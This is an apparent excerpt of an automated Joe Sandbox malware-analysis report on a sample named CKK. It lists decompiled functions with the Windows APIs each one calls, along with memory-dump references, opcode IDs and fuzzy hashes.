                                                                                              • Instruction Fuzzy Hash: 5E021C71E402199BDF14CFA9D9806EDFBF1EF48324F25816AD819EB380D731AE418B94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00A66918
                                                                                              • FindClose.KERNEL32(00000000), ref: 00A66961
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFileFirst
                                                                                              • String ID:
                                                                                              • API String ID: 2295610775-0
                                                                                              • Opcode ID: 6f0ee7330e95f3737ead5f73423f5ff88797d6f35ea2d5dd9a71d3c2dbc8a46d
                                                                                              • Instruction ID: 55c5f979d5ae3172c2d8ab1d22e07083dbb02445bb5efbc6019205da6c33444d
                                                                                              • Opcode Fuzzy Hash: 6f0ee7330e95f3737ead5f73423f5ff88797d6f35ea2d5dd9a71d3c2dbc8a46d
                                                                                              • Instruction Fuzzy Hash: 2111D0726042059FC710DF69C484A26FBE4FF84328F04C699F9698F2A2D730EC05CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00A74891,?,?,00000035,?), ref: 00A637E4
                                                                                              • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00A74891,?,?,00000035,?), ref: 00A637F4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFormatLastMessage
                                                                                              • String ID:
                                                                                              • API String ID: 3479602957-0
                                                                                              • Opcode ID: 0033e04ef3bfa97910bfa3bddf6d4f4fa85098dcdb088d9025f9787f7504f4cf
                                                                                              • Instruction ID: 6ed688dee4d0deede98f6c7610694909a95818de85c4c85864416b8428d1cf5c
                                                                                              • Opcode Fuzzy Hash: 0033e04ef3bfa97910bfa3bddf6d4f4fa85098dcdb088d9025f9787f7504f4cf
                                                                                              • Instruction Fuzzy Hash: 73F0E5B16042282AEB20A7B69C4DFEB7AAEEFC4771F000165F509D2281D9709905CBB0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendInput.USER32(00000001,?,0000001C), ref: 00A5B25D
                                                                                              • keybd_event.USER32 ref: 00A5B270
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: InputSendkeybd_event
                                                                                              • String ID:
                                                                                              • API String ID: 3536248340-0
                                                                                              • Opcode ID: d8802376609429cebf9c431cb5d144dc340e1f9a26a8191ce36f43aadd4280f9
                                                                                              • Instruction ID: 9d03f3f8610b10f6383106e79f1f418f5a53f65295016ead926f0bc82428616c
                                                                                              • Opcode Fuzzy Hash: d8802376609429cebf9c431cb5d144dc340e1f9a26a8191ce36f43aadd4280f9
                                                                                              • Instruction Fuzzy Hash: E0F01D7181424DABDF05DFA0C805BEE7BB4FF04316F008009F955A5191C77986159FA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A511FC), ref: 00A510D4
                                                                                              • CloseHandle.KERNEL32(?), ref: 00A510E9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                                                              • String ID:
                                                                                              • API String ID: 81990902-0
                                                                                              • Opcode ID: 64fa9f5ff7042334c5a0748a99b5b73d9e4bdf1d5e49025fff3de4959ebda7aa
                                                                                              • Instruction ID: 90c375a9c82e320315437fdc3521438a4424c0e8ce14f377479edb7632760960
                                                                                              • Opcode Fuzzy Hash: 64fa9f5ff7042334c5a0748a99b5b73d9e4bdf1d5e49025fff3de4959ebda7aa
                                                                                              • Instruction Fuzzy Hash: 04E04F32004600AEE7256B61FC05E7377A9FB04320B20882DF4A5804F1DB72AC91DB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              • Variable is not of type 'Object'., xrefs: 00A40C40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Variable is not of type 'Object'.
                                                                                              • API String ID: 0-1840281001
                                                                                              • Opcode ID: 278df17b443851f4b187c37ae6ca925c7e5cff9bd19d797f2c5cb93d69cff45e
                                                                                              • Instruction ID: 543133936be1ed262ed7cd6c0755604cbedc766ff25a58520e0a751a344cbe15
                                                                                              • Opcode Fuzzy Hash: 278df17b443851f4b187c37ae6ca925c7e5cff9bd19d797f2c5cb93d69cff45e
                                                                                              • Instruction Fuzzy Hash: A4326AB490021CDBCF14DF94CA81BFDB7B5BF44304F248469EA06AB292D775AD46DB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00A26766,?,?,00000008,?,?,00A2FEFE,00000000), ref: 00A26998
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionRaise
                                                                                              • String ID:
                                                                                              • API String ID: 3997070919-0
                                                                                              • Opcode ID: 292bb2285bcfb931b446304bbca3d27e41171721e4ca0d1f9e39fac5ae1fe109
                                                                                              • Instruction ID: d35a98f4febeede1a288c3d105feb605b371028116e6d1dad8e281195aabaa64
                                                                                              • Opcode Fuzzy Hash: 292bb2285bcfb931b446304bbca3d27e41171721e4ca0d1f9e39fac5ae1fe109
                                                                                              • Instruction Fuzzy Hash: 9BB159316116189FD719CF2CD48AB657BF0FF05364F2986A8E899CF2A2C735E981CB40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID: 0-3916222277
                                                                                              • Opcode ID: 44fbc2a4f23eda6cecded7f07cbda9a3055abb00a0b0edf34fb7a2dd63412c00
                                                                                              • Instruction ID: d404eb2910092a3537351c2af7ae58dc05853fe673524d2a6305386eed4a3621
                                                                                              • Opcode Fuzzy Hash: 44fbc2a4f23eda6cecded7f07cbda9a3055abb00a0b0edf34fb7a2dd63412c00
                                                                                              • Instruction Fuzzy Hash: A3127F75A102299FDB14CF58D9806EEB7F5FF48710F14819AE809EB295DB349E81CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: BlockInput
                                                                                              • String ID:
                                                                                              • API String ID: 3456056419-0
                                                                                              • Opcode ID: 576e1121ea53ad045cd47ac34237311c89f7acb33f3ac942ab116ff96f73ca9b
                                                                                              • Instruction ID: 7bb2d41853a2b538c5e52f7ce80d59d69068e056371d67c37f11616b715dbcd3
                                                                                              • Opcode Fuzzy Hash: 576e1121ea53ad045cd47ac34237311c89f7acb33f3ac942ab116ff96f73ca9b
                                                                                              • Instruction Fuzzy Hash: C9E04F752002089FC710EF99D844E9AF7E9AFA87B0F408426FD49C7351DB70E8418BA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 0
                                                                                              • API String ID: 0-4108050209
                                                                                              • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                              • Instruction ID: 6f88baed240d5a902ae3de44260ace44df7ec524519ed3d6b5179737cce302bd
                                                                                              • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                              • Instruction Fuzzy Hash: 62515B7160C7455BDB388768895DBFE63FA9B02340F183509E883D7282C615DECAD356
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f8f27dbada2723bc84f22919ef29c75d6b424eb1c46d8df8da059e0fb8857dab
                                                                                              • Instruction ID: f5be1f30aa13e515d39a2cb51cae990536f99a9e7c53a73839df147c6a6bd00a
                                                                                              • Opcode Fuzzy Hash: f8f27dbada2723bc84f22919ef29c75d6b424eb1c46d8df8da059e0fb8857dab
                                                                                              • Instruction Fuzzy Hash: A2324531E29F114DD7239638EC62339A649AFB73C5F15D737E81AB59A5EF28C5834200
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f65620f21e47e2f62f9fca8b83dc86dcef3506a60983d37995500251ecb0ec21
                                                                                              • Instruction ID: 5d03b9f64998fc0ad4c6df8819f46925e1c566569c2729a5779345f88b0b9195
                                                                                              • Opcode Fuzzy Hash: f65620f21e47e2f62f9fca8b83dc86dcef3506a60983d37995500251ecb0ec21
                                                                                              • Instruction Fuzzy Hash: 9A32153AA011198BEF68CF29D4D067D77B1EB85374F29866AD44E9B292E330DD81DB40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6414cf0418ee3785e142b77d04bc0fe55183872e539a5e606dddc97f9ae08a8e
                                                                                              • Instruction ID: f16cd8a61dc379f872dcfaf004d55aab4c98285784218c32a373c2bbeb5770b2
                                                                                              • Opcode Fuzzy Hash: 6414cf0418ee3785e142b77d04bc0fe55183872e539a5e606dddc97f9ae08a8e
                                                                                              • Instruction Fuzzy Hash: 1B22A070E046099FDF14CFA9D981ABEF7F6FF44300F244629E816AB291EB35A951CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 13ee9a02cdda60a88605c07e9e6f9ecc722dd5282fee7f57b9165cc44725b16e
                                                                                              • Instruction ID: 8ff4a73e2b7ff511b569933cc64e18332100a3245618f7808b52add63d42dda2
                                                                                              • Opcode Fuzzy Hash: 13ee9a02cdda60a88605c07e9e6f9ecc722dd5282fee7f57b9165cc44725b16e
                                                                                              • Instruction Fuzzy Hash: C202A2B1E00209EFDF04DF54D981AAEB7B5FF44340F108169F9169B2D1EB35AA61CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                              • Instruction ID: 02d9d82f90fb0fb9dfb18dd473bb9174ae9ebff85b471aff639e18b7644e6105
                                                                                              • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                              • Instruction Fuzzy Hash: C791407220D0A34ADB2D437A95740BEFFF15A923A231E079ED5F2CA1C1FE24D5A4D620
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 813cb4fc21a7bc36a409e746659f7b360f2740e374bd8d548b254a79fb50e36f
                                                                                              • Instruction ID: 7b96fadbbb2974845087238f52d820eab681200a0b84f48a19e71231fe9dd4f4
                                                                                              • Opcode Fuzzy Hash: 813cb4fc21a7bc36a409e746659f7b360f2740e374bd8d548b254a79fb50e36f
                                                                                              • Instruction Fuzzy Hash: 1161677120C709A6DA349B288E95BFE63B9DF41780F24391AF883DB281DB159EC2C355
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 41de56e89332298c087deb9cf05b4a743d7f06c07c25bcfaac7b9780aebefed6
                                                                                              • Instruction ID: 5ca6686502399af0231ada93d347f697d7315655dd6fe7d89c7f5db2829b2b7f
                                                                                              • Opcode Fuzzy Hash: 41de56e89332298c087deb9cf05b4a743d7f06c07c25bcfaac7b9780aebefed6
                                                                                              • Instruction Fuzzy Hash: 4661797520C70D57DE388B286951BFE23F89F42744F103959E883CF2C1DA16EDC28A55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                              • Instruction ID: 0b9f8ce92ddb4d02098049526e69b28cd0e1a2f755d3e72e794a39c2d153af1c
                                                                                              • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                              • Instruction Fuzzy Hash: F18174326090A30EDB6D473E85744BEFFE15A923A131E479ED5F2CB1C1EE24D594EA20
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 90b53feed1bba57ece6c6f45db7f7c553c7e42f6e62215a5a04f1d0a3aa7457e
                                                                                              • Instruction ID: c4b699344106fa1fff7b508d2412d5a6b91a3ae8e625241dbf2a53f86f707535
                                                                                              • Opcode Fuzzy Hash: 90b53feed1bba57ece6c6f45db7f7c553c7e42f6e62215a5a04f1d0a3aa7457e
                                                                                              • Instruction Fuzzy Hash: 8621A8326205158BD728CF79C81277A73E5A754310F15862EE4A7C37D0DE75AD04C790
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DeleteObject.GDI32(00000000), ref: 00A72B30
                                                                                              • DeleteObject.GDI32(00000000), ref: 00A72B43
                                                                                              • DestroyWindow.USER32 ref: 00A72B52
                                                                                              • GetDesktopWindow.USER32 ref: 00A72B6D
                                                                                              • GetWindowRect.USER32(00000000), ref: 00A72B74
                                                                                              • SetRect.USER32 ref: 00A72CA3
                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00A72CB1
                                                                                              • CreateWindowExW.USER32 ref: 00A72CF8
                                                                                              • GetClientRect.USER32 ref: 00A72D04
                                                                                              • CreateWindowExW.USER32 ref: 00A72D40
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00A72D62
